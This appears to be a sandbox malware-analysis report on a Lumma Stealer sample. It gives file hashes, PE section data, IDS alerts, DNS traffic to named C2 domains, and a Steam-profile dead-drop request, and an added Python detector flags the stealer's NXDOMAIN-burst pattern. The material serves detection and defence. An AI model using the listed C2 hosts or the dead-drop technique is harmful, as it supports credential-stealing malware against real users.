Time | Type | Description
00:54:05 | API Interceptor | 3x Sleep call for process: file.exe modified
00:54:24 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.53.8
• file.exe | malicious | LummaC
• file.exe | malicious | LummaC
• Setup-Premium.exe | malicious | LummaC
• Solara.exe | malicious | LummaC
• file.exe | malicious | LummaC
• file.exe | malicious | LummaC
• file.exe | malicious | LummaC
• file.exe | malicious | LummaC
• file.exe | malicious | LummaC
• NDJBSLalTk.exe | malicious | LummaC
104.102.49.254
• http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | context: www.valvesoftware.com/legal.htm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
sergei-esenin.com
• WxmEM5HgjY.exe | malicious | LummaC | 172.67.206.204
• file.exe | malicious | LummaC | 104.21.53.8
• file.exe | malicious | LummaC | 172.67.206.204
• file.exe | malicious | LummaC | 104.21.53.8
• Setup.exe | malicious | LummaC | 172.67.206.204
• Setup-Premium.exe | malicious | LummaC | 104.21.53.8
• Solara.exe | malicious | LummaC | 104.21.53.8
• file.exe | malicious | LummaC | 172.67.206.204
• file.exe | malicious | LummaC | 172.67.206.204
• file.exe | malicious | LummaC | 104.21.53.8
steamcommunity.com
• C5u5BZq8gj.exe | malicious | Vidar | 104.102.49.254
• WxmEM5HgjY.exe | malicious | LummaC | 104.102.49.254
• hD2EOjfpfW.exe | malicious | Vidar | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• Setup.exe | malicious | LummaC | 104.102.49.254
• Setup-Premium.exe | malicious | LummaC | 104.102.49.254
• Solara.exe | malicious | LummaC | 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS
• WxmEM5HgjY.exe | malicious | LummaC | 172.67.206.204
• SecuriteInfo.com.FileRepPup.24407.3577.exe | malicious | Unknown | 172.64.41.3
• file.exe | malicious | LummaC | 104.21.53.8
• SecuriteInfo.com.FileRepPup.24407.3577.exe | malicious | Unknown | 172.64.41.3
• file.exe | malicious | LummaC | 172.67.206.204
• file.exe | malicious | LummaC | 104.21.53.8
• cW5i0RdQ4L.exe | malicious | Unknown | 104.21.76.57
• cW5i0RdQ4L.exe | malicious | Unknown | 104.21.76.57
• Setup.exe | malicious | LummaC | 172.67.206.204
• OceanicTools.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
AKAMAI-ASUS
• C5u5BZq8gj.exe | malicious | Vidar | 104.102.49.254
• WxmEM5HgjY.exe | malicious | LummaC | 104.102.49.254
• hD2EOjfpfW.exe | malicious | Vidar | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• file.exe | malicious | LummaC | 104.102.49.254
• Setup.exe | malicious | LummaC | 104.102.49.254
• Setup-Premium.exe | malicious | LummaC | 104.102.49.254
• Solara.exe | malicious | LummaC | 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1
• WxmEM5HgjY.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• Setup.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• Setup-Premium.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• Solara.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
• file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254
                                  No context
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):1.0363196584133112
Encrypted:false
SSDEEP:192:hyZYivg7tPlktS0BU/7E3juFJRfRazuiFE4Z24IO8ThB:iMtN6ZBU/AjKRpazuiFBY4IO8r
MD5:50B782B1A2E758AD6A93DC856E5ACA34
SHA1:1997A645773A92A715F8194EEC728907029C1D92
SHA-256:300FF6E169F39B9C78DAC65C3E89B0E816BDED85A942F83184611C5F530FEE83
SHA-512:2880385F5285A2572C34F89D9A544A413164CC510B8ECD32E3A15B94536022136675CF30C62298FF7B23230446DF5FF9383B65B6BDAC07A9B5AA0602A9E644EC
Malicious:true
Reputation:low

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 04:54:10 2024, 0x1205a4 type
Category:dropped
Size (bytes):284434
Entropy (8bit):1.5020274599815684
Encrypted:false
SSDEEP:768:dUJZZABphVK/BmXxYejSymOnBN+0lVXvzB6A1zKUaAlYLRzY0Ho:+TuK/oBOO+Kv96AsUanF7I
MD5:5199E5EB628B9ACFBD86D44FB2D6BCC3
SHA1:A9E8A7D861E54F4EBE6C2D02B0F11224B778E717
SHA-256:67E94788F21E9EDA65525C6B0B61288136F744F2983F3D28EC6A29FAB93CFED6
SHA-512:968A1E4A3ABBA0EECA979D310A480FF6B952F10770251782CD06A8E254D4FA10D5321D7C7840A75536C29B44FC74C00D0FD715503AB26CD5D2D711F50CDF951B
Malicious:false
Reputation:low
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8298
                                  Entropy (8bit):3.6962348086411083
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJmCf6W/1Nq6YEIGJSUoCngmfBGe/pry89bBssfYvLm:R6lXJ96W/1Nq6YEfJSUoCngmfZpB/fh
                                  MD5:94A590EFABEAA7754757ECEA36FC117C
                                  SHA1:F3E009BF2C9ADC10774B4ADD5BBAB5F458A8251F
                                  SHA-256:908FC6F54F336550F326A4DF1D3B3BB421843BC633E2EA3B0A8A0CDA0B8E6CF6
                                  SHA-512:E949502F68DAD59619749746BC64DC16CA2205850041D953591EA700EE7CA7E71FFF2D84F702D28C76948EFD02AABB0380A44EB8D8308B0F4DA7E80D9F46A342
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4542
                                  Entropy (8bit):4.425835017715291
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsOJg77aI9bIWpW8VYGlYm8M4JjlFi+q8Czrow4d:uIjfEI71h7VjUJGjrow4d
                                  MD5:D823EDA9F365914C64F8E060FC2F0EC2
                                  SHA1:E28229DAC7881EB335CF3711B47504415F6FBA03
                                  SHA-256:A36DDC7399A470E2D886DF52AAAB23109255698334B3AA64313C20A76D446F78
                                  SHA-512:90377814066DD8E2E2F780CDD404A0D0365B527AE88E4A5B6038255F469ED691C6B93F686C690465587D8432F3F9461460AF192D0FD7E04BB3CC0A395260874A
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="541196" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421344990139069
                                  Encrypted:false
                                  SSDEEP:6144:YSvfpi6ceLP/9skLmb0OTVWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:jvloTVW+EZMM6DFy403w
                                  MD5:3BB1E45FB563338A784117D093CE35F4
                                  SHA1:5C7815F36A4A98C1C1D95FA180190ED134A826FD
                                  SHA-256:9B34AE80D28CD7F4EBA1ABF995632D6DA3A23F6FE7B044A12631B47460848DEA
                                  SHA-512:531B5509AEE2381861C92DBAC94908D3086B960F0BFE655E316086F62C4BA99B98DEC36634984E9D36D3AE98C58713E871431D3D5A74083014887A6616E36F53
                                  Malicious:false
                                  Reputation:low
                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:T..+...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.947312085711275
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'808'384 bytes
                                  MD5:34124e70e2508de56d89b57345b39f65
                                  SHA1:21ba55d1758aecf6a8d54e3550a1cf4c2764c255
                                  SHA256:582e159bf52a2543356aaa21d4e0b6d12c831e53640bb2a92528d6b76a759a37
                                  SHA512:a1d8b984fe5193fcdb7e374fe27760549d8e17f26a9c3887b40a16d13cb90e8e7c329979c7e0225aae14977e3ab5d3f5c62c2226b7a45e1e5147274e95cb78a7
                                  SSDEEP:24576:GZ2XfQrE+ZumSUPtkFP9gi9VD28t3NCs/FoJmS0lrkemfawQtWsNG5Nwuv7oEaYQ:GZI56PtkFmcAKqJ2lNmCwQtWd5eu8Ea
                                  TLSH:528533C3E93BD199E5AA8B3255B5FC794B14D7ED0179DEE52D2262E10C4CFCA13422B0
                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................pH...........@...........................H...........@.................................W...k..
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x887000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007FDDACC6436Ah
                                  pcmpeqd mm3, qword ptr [ebx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5f057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5f1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x5d000 | 0x25e00 | a8bc5590e13808a05256d5d8a8f69f1c | False | 0.9995616749174917 | data | 7.986794328834298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5e000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5f000 | 0x1000 | 0x200 | fe72def8b74193a84232a780098a7ce0 | False | 0.150390625 | data | 1.04205214219471 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x60000 | 0x296000 | 0x200 | b662879c753c07ad1a9d62b76ecf57e3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xuggjiye | 0x2f6000 | 0x190000 | 0x18fe00 | 239e3c15a1a442666bdbaa15de796461 | False | 0.9939983686308221 | data | 7.95408344029227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eirrygcb | 0x486000 | 0x1000 | 0x600 | 1ea5e59a16de13eafcd8d29387ac3a49 | False | 0.6022135416666666 | data | 5.224357358428615 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x487000 | 0x3000 | 0x2200 | 9bfa2b38d5f414ccfacba0cb16543dee | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T06:54:07.200212+0200 | 2056471 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) | 1 | 192.168.2.5 | 60610 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:07.212395+0200 | 2056485 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) | 1 | 192.168.2.5 | 58072 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:07.227366+0200 | 2056483 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) | 1 | 192.168.2.5 | 61073 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:07.238202+0200 | 2056481 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) | 1 | 192.168.2.5 | 56335 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:07.249676+0200 | 2056479 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) | 1 | 192.168.2.5 | 65011 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:07.260005+0200 | 2056477 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) | 1 | 192.168.2.5 | 54989 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:07.269827+0200 | 2056475 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) | 1 | 192.168.2.5 | 52579 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:07.280214+0200 | 2056473 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) | 1 | 192.168.2.5 | 63164 | 1.1.1.1 | 53 | UDP
2024-10-13T06:54:08.962762+0200 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP
2024-10-13T06:54:09.743288+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 104.21.53.8 | 443 | TCP
2024-10-13T06:54:09.743288+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.53.8 | 443 | TCP
2024-10-13T06:54:10.829268+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49706 | 104.21.53.8 | 443 | TCP
2024-10-13T06:54:10.829268+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 104.21.53.8 | 443 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 13, 2024 06:54:07.200212002 CEST | 192.168.2.5 | 1.1.1.1 | 0xbfe | Standard query (0) | clearancek.site | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.212394953 CEST | 192.168.2.5 | 1.1.1.1 | 0xfe82 | Standard query (0) | mobbipenju.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.227365971 CEST | 192.168.2.5 | 1.1.1.1 | 0x9b63 | Standard query (0) | eaglepawnoy.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.238202095 CEST | 192.168.2.5 | 1.1.1.1 | 0xfa25 | Standard query (0) | dissapoiznw.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.249675989 CEST | 192.168.2.5 | 1.1.1.1 | 0x539d | Standard query (0) | studennotediw.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.260004997 CEST | 192.168.2.5 | 1.1.1.1 | 0x5bc6 | Standard query (0) | bathdoomgaz.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.269826889 CEST | 192.168.2.5 | 1.1.1.1 | 0x95fa | Standard query (0) | spirittunek.store | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.280214071 CEST | 192.168.2.5 | 1.1.1.1 | 0x6679 | Standard query (0) | licendfilteo.site | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.292706013 CEST | 192.168.2.5 | 1.1.1.1 | 0xb37e | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:09.103883982 CEST | 192.168.2.5 | 1.1.1.1 | 0xf6dc | Standard query (0) | sergei-esenin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 13, 2024 06:54:07.209062099 CEST | 1.1.1.1 | 192.168.2.5 | 0xbfe | Name error (3) | clearancek.site | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.225229979 CEST | 1.1.1.1 | 192.168.2.5 | 0xfe82 | Name error (3) | mobbipenju.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.236216068 CEST | 1.1.1.1 | 192.168.2.5 | 0x9b63 | Name error (3) | eaglepawnoy.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.247613907 CEST | 1.1.1.1 | 192.168.2.5 | 0xfa25 | Name error (3) | dissapoiznw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.258575916 CEST | 1.1.1.1 | 192.168.2.5 | 0x539d | Name error (3) | studennotediw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.268588066 CEST | 1.1.1.1 | 192.168.2.5 | 0x5bc6 | Name error (3) | bathdoomgaz.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.278673887 CEST | 1.1.1.1 | 192.168.2.5 | 0x95fa | Name error (3) | spirittunek.store | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.288796902 CEST | 1.1.1.1 | 192.168.2.5 | 0x6679 | Name error (3) | licendfilteo.site | none | none | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:07.299329996 CEST | 1.1.1.1 | 192.168.2.5 | 0xb37e | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:09.114906073 CEST | 1.1.1.1 | 192.168.2.5 | 0xf6dc | No error (0) | sergei-esenin.com | | 104.21.53.8 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 06:54:09.114906073 CEST | 1.1.1.1 | 192.168.2.5 | 0xf6dc | No error (0) | sergei-esenin.com | | 172.67.206.204 | A (IP address) | IN (0x0001) | false
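The DNS answers above show the footprint this sample leaves in resolver logs: eight look-alike .site/.store names fail with NXDOMAIN inside roughly 80 ms, then steamcommunity.com resolves and, two seconds later, sergei-esenin.com, the host that receives the C2 POSTs. The following is an added example, not part of the Joe Sandbox report, that detects that shape in a one-line-per-answer DNS log. The log format, the client-field layout and the thresholds (at least five failures, a two-second window) are assumptions of the example; the timestamps, transaction IDs, names and addresses in the constructed sample are copied from the answers table above, truncated to microseconds.

```python
"""
Flag a "dead-drop probing" pattern in DNS answer logs: one client fires a
burst of queries that all come back NXDOMAIN, then gets a successful answer
for a different name within a short window.

Added example, not part of the Joe Sandbox report. Log format, field layout
and thresholds are assumptions of this example.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Constructed sample: "<date> <time> <src> <dst> <txid> <rcode> <name> <answer|->"
# Values copied from the report's DNS answers, timestamps truncated to microseconds.
SAMPLE_LOG = """\
2024-10-13 06:54:07.209062 1.1.1.1 192.168.2.5 0xbfe 3 clearancek.site -
2024-10-13 06:54:07.225229 1.1.1.1 192.168.2.5 0xfe82 3 mobbipenju.store -
2024-10-13 06:54:07.236216 1.1.1.1 192.168.2.5 0x9b63 3 eaglepawnoy.store -
2024-10-13 06:54:07.247613 1.1.1.1 192.168.2.5 0xfa25 3 dissapoiznw.store -
2024-10-13 06:54:07.258575 1.1.1.1 192.168.2.5 0x539d 3 studennotediw.store -
2024-10-13 06:54:07.268588 1.1.1.1 192.168.2.5 0x5bc6 3 bathdoomgaz.store -
2024-10-13 06:54:07.278673 1.1.1.1 192.168.2.5 0x95fa 3 spirittunek.store -
2024-10-13 06:54:07.288796 1.1.1.1 192.168.2.5 0x6679 3 licendfilteo.site -
2024-10-13 06:54:07.299329 1.1.1.1 192.168.2.5 0xb37e 0 steamcommunity.com 104.102.49.254
2024-10-13 06:54:09.114906 1.1.1.1 192.168.2.5 0xf6dc 0 sergei-esenin.com 104.21.53.8
2024-10-13 06:54:09.114906 1.1.1.1 192.168.2.5 0xf6dc 0 sergei-esenin.com 172.67.206.204
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\S+) (?P<dst>\S+) (?P<txid>0x[0-9a-f]+) "
    r"(?P<rcode>\d+) (?P<name>\S+) (?P<addr>\S+)$"
)


@dataclass
class DnsAnswer:
    ts: datetime
    client: str          # the host that asked (destination of the answer packet)
    txid: int
    rcode: int           # 0 = NOERROR, 3 = NXDOMAIN
    name: str
    address: Optional[str]


def parse_answers(text: str) -> list:
    """Parse the assumed one-line answer format; lines that do not match are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        out.append(DnsAnswer(
            ts=datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            client=m["dst"],
            txid=int(m["txid"], 16),
            rcode=int(m["rcode"]),
            name=m["name"],
            address=None if m["addr"] == "-" else m["addr"],
        ))
    return out


def find_nxdomain_bursts(answers, min_failures=5, window=timedelta(seconds=2)):
    """One finding per burst: the NXDOMAIN names in the run and the first name
    that resolved within `window` after the run ended."""
    findings = []
    by_client = {}
    for a in sorted(answers, key=lambda x: x.ts):
        by_client.setdefault(a.client, []).append(a)
    for client, recs in by_client.items():
        run = []
        for a in recs:
            if a.rcode == 3:
                if run and a.ts - run[0].ts > window:   # burst went stale, start over
                    run = []
                run.append(a)
            else:
                if len(run) >= min_failures and a.ts - run[-1].ts <= window:
                    findings.append({
                        "client": client,
                        "failed": [r.name for r in run],
                        "first_resolved": a.name,
                        "resolved_to": a.address,
                    })
                run = []
    return findings


if __name__ == "__main__":
    for f in find_nxdomain_bursts(parse_answers(SAMPLE_LOG)):
        print(f"{f['client']}: {len(f['failed'])} NXDOMAIN then {f['first_resolved']} -> {f['resolved_to']}")
```

On the sample the detector reports one burst for 192.168.2.5 (eight failed names, first resolved name steamcommunity.com). The window is deliberately short: legitimate NXDOMAIN runs from typosquatting protection or search-domain suffixing are spread over time, while a stealer walks its hard-coded list as fast as the resolver answers.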
                                  • steamcommunity.com
                                  • sergei-esenin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | 7140 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-13 04:54:08 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-10-13 04:54:08 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 13 Oct 2024 04:54:08 GMT
Content-Length: 34837
Connection: close
Set-Cookie: sessionid=0baa650966fc0dfdba08ab88; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
